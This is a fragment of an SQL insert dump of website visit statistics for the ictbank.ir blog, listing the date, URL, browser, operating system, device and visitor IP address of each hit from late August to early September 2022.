(23741,'2022-08-27','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','66.240.236.119','000',0,2,0),
(23742,'2022-08-27','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.194','000',0,2,0),
(23743,'2022-08-28','http://ictbank.ir/blog','Firefox','OS X','5.0.1','desktop','Macintosh','','208.80.194.126','000',0,5,0),
(23744,'2022-08-28','http://ictbank.ir/blog','Chrome','Windows','79.0','desktop','Unknown','','20.163.113.224','000',0,1,0),
(23745,'2022-08-28','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.42','000',0,2,0),
(23746,'2022-08-28','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.53','000',0,35,0),
(23747,'2022-08-28','http://ictbank.ir/blog','QQ Browser','Android','8.9','mobile:smart','Mate 10 Pro','','43.154.221.77','000',0,1,0),
(23748,'2022-08-28','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.56','000',0,1,0),
(23749,'2022-08-28','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','185.165.190.17','000',0,2,0),
(23750,'2022-08-28','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.62','000',0,2,0),
(23751,'2022-08-28','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.31','000',0,12,0),
(23752,'2022-08-28','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.141.34','000',0,2,0),
(23753,'2022-08-28','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.27','000',0,17,0),
(23754,'2022-08-28','http://ictbank.ir/blog','Firefox','OS X','5.0.1','desktop','Macintosh','','208.80.194.121','000',0,4,0),
(23755,'2022-08-28','http://ictbank.ir/blog','Safari','Windows','5.0.4','desktop','Unknown','','44.198.157.111','000',0,1,0),
(23756,'2022-08-28','http://82.102.9.14/blog','Chrome','Android','101.0.4951.61','mobile:smart','Pixel 4','','43.246.208.2','000',0,1,0),
(23757,'2022-08-28','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.33','000',0,1,0),
(23758,'2022-08-28','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(23759,'2022-08-28','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.221.140.118','000',0,1,0),
(23760,'2022-08-28','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.25','000',0,10,0),
(23761,'2022-08-28','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(23762,'2022-08-28','http://ictbank.ir/blog','Firefox','Windows','73.0','desktop','Unknown','','5.161.132.202','000',0,1,0),
(23763,'2022-08-28','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,2,0),
(23764,'2022-08-28','http://ictbank.ir/blog','Safari','OS X','5.1','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(23765,'2022-08-28','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.22','000',0,3,0),
(23766,'2022-08-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','192.81.222.35','000',0,1,0),
(23767,'2022-08-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.6.75','000',0,1,0),
(23768,'2022-08-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(23769,'2022-08-28','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','159.65.21.153','000',0,1,0),
(23770,'2022-08-28','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.49.169','000',0,2,0),
(23771,'2022-08-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','45.61.188.77','000',0,2,0),
(23772,'2022-08-28','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.39','000',0,5,0),
(23773,'2022-08-28','http://ictbank.ir/blog','Chrome','Linux','85.0.4183.83','desktop','Unknown','','195.123.241.30','000',0,14,0),
(23774,'2022-08-28','http://ictbank.ir/blog','Chrome','Linux','85.0.4183.83','desktop','Unknown','','195.123.240.173','000',0,2,0),
(23775,'2022-08-28','http://ictbank.ir/blog','Firefox','OS X','102.0','desktop','Macintosh','','172.245.211.66','000',0,2,0),
(23776,'2022-08-29','http://ictbank.ir/blog','Firefox','OS X','50.0','desktop','Macintosh','','116.202.209.244','000',0,9,0),
(23777,'2022-08-29','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.50','000',0,5,0),
(23778,'2022-08-29','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.62','000',0,2,0),
(23779,'2022-08-29','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(23780,'2022-08-29','http://ictbank.ir/blog','Chrome','Windows','90.0.4430.85','desktop','Unknown','','195.3.222.14','000',0,1,0),
(23781,'2022-08-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.87','000',0,2,0),
(23782,'2022-08-29','http://ictbank.ir/blog','Edge','Windows','18','desktop','Unknown','','147.78.47.233','000',0,2,0),
(23783,'2022-08-29','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','208.80.194.122','000',0,4,0),
(23784,'2022-08-29','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.26','000',0,2,0),
(23785,'2022-08-29','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.41','000',0,2,0),
(23786,'2022-08-29','http://82.102.9.14/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','185.220.101.191','000',0,1,0),
(23787,'2022-08-29','http://ictbank.ir/blog','Firefox','Windows','3.6.8','desktop','Unknown','','208.80.194.126','000',0,2,0),
(23788,'2022-08-29','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.48','000',0,3,0),
(23789,'2022-08-29','http://82.102.9.14/blog','Internet Explorer','Windows','10.0','desktop','Unknown','','45.148.10.193','000',0,2,0),
(23790,'2022-08-29','http://ictbank.ir/blog','Firefox','Windows','40.1','desktop','Unknown','','62.3.20.173','000',0,2,0),
(23791,'2022-08-29','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.213.215.84','000',0,1,0),
(23792,'2022-08-29','http://ictbank.ir/blog','Chrome','Windows','57.0.2987.133','desktop','Unknown','','185.119.81.109','000',0,2,0),
(23793,'2022-08-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.211.0','000',0,1,0),
(23794,'2022-08-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(23795,'2022-08-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(23796,'2022-08-29','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(23797,'2022-08-29','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','23.100.232.233','000',0,2,0),
(23798,'2022-08-29','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.162','000',0,2,0),
(23799,'2022-08-29','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.90','000',0,3,0),
(23800,'2022-08-29','http://ictbank.ir/blog/index.php/category/web-security/','Edge','Windows','90.0.818.46','desktop','Unknown','','37.139.53.30','000',0,8,0),
(23801,'2022-08-30','http://ictbank.ir/blog/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','Chrome','Windows','90.0.4430.86','desktop','Unknown','','37.139.53.10','000',0,8,0),
(23802,'2022-08-30','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.71','000',0,2,0),
(23803,'2022-08-30','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,4,0),
(23804,'2022-08-30','http://ictbank.ir/blog','Chrome','Windows','88.0.4240.193','desktop','Unknown','','20.100.192.63','000',0,1,0),
(23805,'2022-08-30','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(23806,'2022-08-30','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','45.33.96.205','000',0,2,0),
(23807,'2022-08-30','http://ictbank.ir/blog','Chrome','Windows','43.0.2357.65','desktop','Unknown','','185.119.81.109','000',0,5,0),
(23808,'2022-08-30','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(23809,'2022-08-30','http://ictbank.ir/blog','Chrome','OS X','39.0.2171.95','desktop','Macintosh','','65.108.61.221','000',0,7,0),
(23810,'2022-08-30','http://ictbank.ir/blog/','Edge','Windows','90.0.818.39','desktop','Unknown','','156.146.63.151','000',0,1,0),
(23811,'2022-08-30','http://82.102.9.14/','Chrome','OS X','17.0.963.56','desktop','Macintosh','','154.198.193.134','000',0,3,0),
(23812,'2022-08-30','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.194','000',0,2,0),
(23813,'2022-08-30','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.89','000',0,3,0),
(23814,'2022-08-30','http://ictbank.ir/blog','Chrome','OS X','11.0.696.68','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(23815,'2022-08-30','http://ictbank.ir/blog','Chrome','Windows','51.0.3056.110','desktop','Unknown','','54.198.0.9','000',0,2,0),
(23816,'2022-08-30','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.83','000',0,1,0),
(23817,'2022-08-30','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.88','000',0,1,0),
(23818,'2022-08-30','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','77.74.177.119','000',0,2,0),
(23819,'2022-08-30','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','65.21.206.45','000',0,1,0),
(23820,'2022-08-30','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(23821,'2022-08-30','http://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,1,0),
(23822,'2022-08-30','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.202.229.113','000',0,1,0),
(23823,'2022-08-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(23824,'2022-08-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','82.196.5.234','000',0,1,0),
(23825,'2022-08-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','159.65.21.153','000',0,1,0),
(23826,'2022-08-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(23827,'2022-08-30','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.5','000',0,2,0),
(23828,'2022-08-30','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','71.6.165.200','000',0,2,0),
(23829,'2022-08-30','http://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','185.39.144.147','000',0,2,0),
(23830,'2022-08-30','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.90','desktop','Unknown','','180.149.125.168','000',0,1,0),
(23831,'2022-08-30','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.62','000',0,2,0),
(23832,'2022-08-30','http://ictbank.ir/blog/','Chrome','Windows','90.0.4430.85','desktop','Unknown','','95.105.125.184','000',0,6,0),
(23833,'2022-08-30','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','23.90.160.122','000',0,2,0),
(23834,'2022-08-31','http://ictbank.ir/blog','Opera','Windows','8.01','desktop','Unknown','','208.80.194.121','000',0,5,0),
(23835,'2022-08-31','http://ictbank.ir/blog','Chrome','Windows','14.0.835.187','desktop','Unknown','','208.80.194.122','000',0,1,0),
(23836,'2022-08-31','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,2,0),
(23837,'2022-08-31','http://ictbank.ir/blog','Chrome','Windows','5.0.375.99','desktop','Unknown','','193.202.110.30','000',0,1,0),
(23838,'2022-08-31','http://ictbank.ir/blog/index.php/tag/database/','Chrome','Windows','90.0.4430.86','desktop','Unknown','','37.139.53.20','000',0,7,0),
(23839,'2022-08-31','http://ictbank.ir/','Chrome','Windows','33.0.2568.75','desktop','Unknown','','117.140.136.167','000',0,1,0),
(23840,'2022-08-31','http://ictbank.ir/blog','Chrome','Windows','79.0.3945.117','desktop','Unknown','','185.119.81.109','000',0,4,0),
(23841,'2022-08-31','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(23842,'2022-08-31','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(23843,'2022-08-31','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Firefox','Windows','50.0','desktop','Unknown','','84.158.199.121','000',0,1,0),
(23844,'2022-08-31','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.219.208.73','000',0,1,0),
(23845,'2022-08-31','http://ictbank.ir/blog','Chrome','Windows','5.0.375.99','desktop','Unknown','','108.167.189.22','000',0,3,0),
(23846,'2022-08-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','108.61.123.152','000',0,1,0),
(23847,'2022-08-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','185.14.187.177','000',0,1,0),
(23848,'2022-08-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(23849,'2022-08-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','159.65.21.153','000',0,1,0),
(23850,'2022-08-31','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(23851,'2022-09-01','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','208.80.194.121','000',0,7,0),
(23852,'2022-09-01','http://82.102.9.14/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','185.220.101.170','000',0,1,0),
(23853,'2022-09-01','http://82.102.9.14/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','185.180.143.148','000',0,2,0),
(23854,'2022-09-01','http://ictbank.ir/blog','Firefox','OS X','68.0','desktop','Macintosh','','152.89.196.13','000',0,1,0),
(23855,'2022-09-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.197','000',0,2,0),
(23856,'2022-09-01','http://ictbank.ir/blog','Chrome','Windows','11.0.696.68','desktop','Unknown','','208.80.194.122','000',0,1,0),
(23857,'2022-09-01','http://82.102.9.14/blog','Firefox','Linux','73.0','desktop','Unknown','','157.245.126.199','000',0,2,0),
(23858,'2022-09-01','https://www.qwant.com/','Chrome','Linux','103.0.0.0','desktop','Unknown','','79.187.136.146','000',0,2,0),
(23859,'2022-09-01','http://ictbank.ir/blog','Chrome','Windows','5.0.375.99','desktop','Unknown','','108.167.189.76','000',0,1,0),
(23860,'2022-09-01','http://ictbank.ir/blog','Firefox','Windows','55.0','desktop','Unknown','','64.188.30.110','000',0,2,0),
(23861,'2022-09-01','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','208.80.194.126','000',0,2,0),
(23862,'2022-09-01','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.91.32.62','000',0,1,0),
(23863,'2022-09-01','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.135','000',0,2,0),
(23864,'2022-09-01','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','142.93.101.206','000',0,2,0),
(23865,'2022-09-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.77.62.18','000',0,1,0),
(23866,'2022-09-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','185.14.187.177','000',0,1,0),
(23867,'2022-09-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(23868,'2022-09-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(23869,'2022-09-01','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(23870,'2022-09-01','http://82.102.9.14/blog','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.34','000',0,1,0),
(23871,'2022-09-01','http://82.102.9.14/blog/','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.37','000',0,1,0),
(23872,'2022-09-02','http://www.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','193.118.55.146','000',0,2,0),
(23873,'2022-09-02','http://ictbank.ir/blog','Safari','OS X','5.1','desktop','Macintosh','','208.80.194.121','000',0,4,0),
(23874,'2022-09-02','http://ictbank.ir/blog','Chrome','OS X','14.0.835.202','desktop','Macintosh','','208.80.194.126','000',0,6,0),
(23875,'2022-09-02','http://ictbank.ir/blog','Chrome','Android','81.0.4044.138','mobile:smart','Nexus 5','','101.35.239.216','000',0,2,0),
(23876,'2022-09-02','http://ictbank.ir/blog','Chrome','Android','81.0.4044.138','mobile:smart','Nexus 5','','124.223.196.102','000',0,7,0),
(23877,'2022-09-02','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(23878,'2022-09-02','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.62','000',0,12,0),
(23879,'2022-09-02','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.90','desktop','Unknown','','180.149.125.167','000',0,1,0),
(23880,'2022-09-02','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','64.124.51.154','000',0,2,0),
(23881,'2022-09-02','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','66.240.236.119','000',0,2,0),
(23882,'2022-09-02','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','213.168.251.56','000',0,2,0),
(23883,'2022-09-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.198','000',0,2,0),
(23884,'2022-09-02','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','52.43.90.106','000',0,1,0),
(23885,'2022-09-02','https://www.bing.com','Chrome','Windows','30.0.1599.17','desktop','Unknown','','50.54.130.20','000',0,20,0),
(23886,'2022-09-02','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(23887,'2022-09-02','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(23888,'2022-09-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.14.171','000',0,1,0),
(23889,'2022-09-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(23890,'2022-09-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(23891,'2022-09-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(23892,'2022-09-02','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.59','000',0,1,0),
(23893,'2022-09-02','http://ictbank.ir/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','67.205.42.26','000',0,1,0),
(23894,'2022-09-02','http://ictbank.ir/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','50.62.176.164','000',0,1,0),
(23895,'2022-09-02','http://ictbank.ir/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','91.235.100.49','000',0,1,0),
(23896,'2022-09-02','http://ictbank.ir/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.0.232.67','000',0,1,0),
(23897,'2022-09-02','http://ictbank.ir/blog','Firefox','Windows','77.0','desktop','Unknown','','88.99.95.125','000',0,1,0),
(23898,'2022-09-02','http://ictbank.ir/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','178.254.11.57','000',0,1,0),
(23899,'2022-09-02','http://wikisonnati.ir/blog','Chrome','OS X','91.0.4472.114','desktop','Macintosh','','185.27.99.116','000',0,1,0),
(23900,'2022-09-02','http://wikisonnati.ir/blog/','Chrome','OS X','91.0.4472.114','desktop','Macintosh','','185.27.99.125','000',0,1,0),
(23901,'2022-09-03','https://www.bing.com/','Edge','Windows','105.0.1343.25','desktop','Unknown','','73.147.228.225','000',0,1,0),
(23902,'2022-09-03','http://ictbank.ir/blog','Vivaldi','Linux','5.3.2679.68','desktop','Unknown','','31.222.247.179','000',0,3,0),
(23903,'2022-09-03','http://ictbank.ir/blog','Chrome','OS X','51.0.2704.84','desktop','Macintosh','','199.244.88.220','000',0,1,0),
(23904,'2022-09-03','http://ictbank.ir/blog','Chromium','Ubuntu','12.0.742.112','desktop','Unknown','','208.80.194.126','000',0,6,0),
(23905,'2022-09-03','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','178.79.131.203','000',0,2,0),
(23906,'2022-09-03','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','3.68.50.38','000',0,1,0),
(23907,'2022-09-03','http://ictbank.ir/blog','Chrome','Linux','103.0.5060.134','desktop','Unknown','','35.165.215.140','000',0,2,0),
(23908,'2022-09-03','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','64.227.107.188','000',0,2,0),
(23909,'2022-09-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.87','000',0,2,0),
(23910,'2022-09-03','http://ictbank.ir/blog','Firefox','OS X','3.6.11','desktop','Macintosh','','208.80.194.121','000',0,3,0),
(23911,'2022-09-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','20.163.99.182','000',0,4,0),
(23912,'2022-09-03','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(23913,'2022-09-03','http://ictbank.ir/blog','Safari','iOS','11.0','mobile:smart','iPhone','','18.232.186.3','000',0,1,0),
(23914,'2022-09-03','http://ictbank.ir/blog','Chrome','Windows','90.0.4430.85','desktop','Unknown','','195.3.222.14','000',0,1,0),
(23915,'2022-09-03','http://www.design-arena.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','51.89.228.207','000',0,2,0),
(23916,'2022-09-03','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.62','000',0,2,0),
(23917,'2022-09-03','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.149.231.241','000',0,1,0),
(23918,'2022-09-03','http://82.102.9.14/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','185.220.101.185','000',0,1,0),
(23919,'2022-09-03','http://ictbank.ir/blog','Yandex Browser','OS X','22.7.0','desktop','Macintosh','','102.165.53.39','000',0,12,0),
(23920,'2022-09-03','http://www.ictbank.ir/blog','Yandex Browser','OS X','22.7.0','desktop','Macintosh','','185.122.170.82','000',0,2,0),
(23921,'2022-09-03','http://82.102.9.14/blog','Firefox','Windows','79.0','desktop','Unknown','','164.52.24.190','000',0,1,0),
(23922,'2022-09-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.6.75','000',0,2,0),
(23923,'2022-09-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(23924,'2022-09-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(23925,'2022-09-04','http://82.102.9.14/','Internet Explorer','Windows','9.0','desktop','Unknown','','124.221.102.51','000',0,4,0),
(23926,'2022-09-04','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','208.80.194.122','000',0,5,0),
(23927,'2022-09-04','http://ictbank.ir/blog','Unknown','OS X','Unknown','desktop','Macintosh','','94.247.172.129','000',0,2,0),
(23928,'2022-09-04','http://ictbank.ir/blog','Chrome','Linux','5.0.375.53','desktop','Unknown','','208.80.194.121','000',0,1,0),
(23929,'2022-09-04','http://82.102.9.14:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(23930,'2022-09-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.198','000',0,2,0),
(23931,'2022-09-04','http://ictbank.ir/blog','Chrome','Android','104.0.0.0','mobile:smart','Galaxy A11','','5.127.10.174','000',0,3,0),
(23932,'2022-09-04','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,2,0),
(23933,'2022-09-04','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.21','000',0,1,0),
(23934,'2022-09-04','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.62','000',0,1,0),
(23935,'2022-09-04','http://ictbank.ir/blog','Chrome','Windows','14.0.835.187','desktop','Unknown','','208.80.194.126','000',0,3,0),
(23936,'2022-09-04','http://82.102.9.14/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.35.128','000',0,1,0),
(23937,'2022-09-04','http://ictbank.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.36.231','000',0,1,0),
(23938,'2022-09-04','http://mail.design-arena.ir/blog','Chrome','OS X','96.0.4664.110','desktop','Macintosh','','209.141.55.120','000',0,1,0),
(23939,'2022-09-04','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/#comment-82','Chrome','Windows','90.0.4430.93','desktop','Unknown','','178.159.37.11','000',0,8,0),
(23940,'2022-09-04','http://ictbank.ir/blog','Safari','Windows','5.0.4','desktop','Unknown','','44.198.50.13','000',0,1,0),
(23941,'2022-09-04','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.89.223.15','000',0,1,0),
(23942,'2022-09-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','185.14.184.197','000',0,1,0),
(23943,'2022-09-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.6.75','000',0,1,0),
(23944,'2022-09-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(23945,'2022-09-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(23946,'2022-09-04','http://ictbank.ir/blog','Safari','iOS','11.0','mobile:smart','iPhone','','44.207.124.84','000',0,1,0),
(23947,'2022-09-05','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,7,0),
(23948,'2022-09-05','http://ictbank.ir/blog','Chrome','OS X','91.0.4472.114','desktop','Macintosh','','185.27.99.141','000',0,1,0),
(23949,'2022-09-05','http://ictbank.ir/blog','Chrome','Windows','85.0.4183.121','desktop','Unknown','','190.242.98.162','000',0,9,0),
(23950,'2022-09-05','http://ictbank.ir/blog','Safari','OS X','5.1','desktop','Macintosh','','208.80.194.122','000',0,3,0),
(23951,'2022-09-05','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,14,0),
(23952,'2022-09-05','http://82.102.9.14:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.62','000',0,2,0),
(23953,'2022-09-05','http://82.102.9.14/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.162','000',0,2,0),
(23954,'2022-09-05','http://ictbank.ir/blog','Chrome','Linux','58.0.3029.110','desktop','Unknown','','54.221.150.212','000',0,1,0),
